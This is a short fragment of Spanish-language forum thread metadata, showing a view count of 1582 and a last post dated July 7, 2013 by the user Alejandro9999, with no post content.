Vistas: 1582
Último mensaje Julio 07, 2013, 10:51:08 pm
por Alejandro9999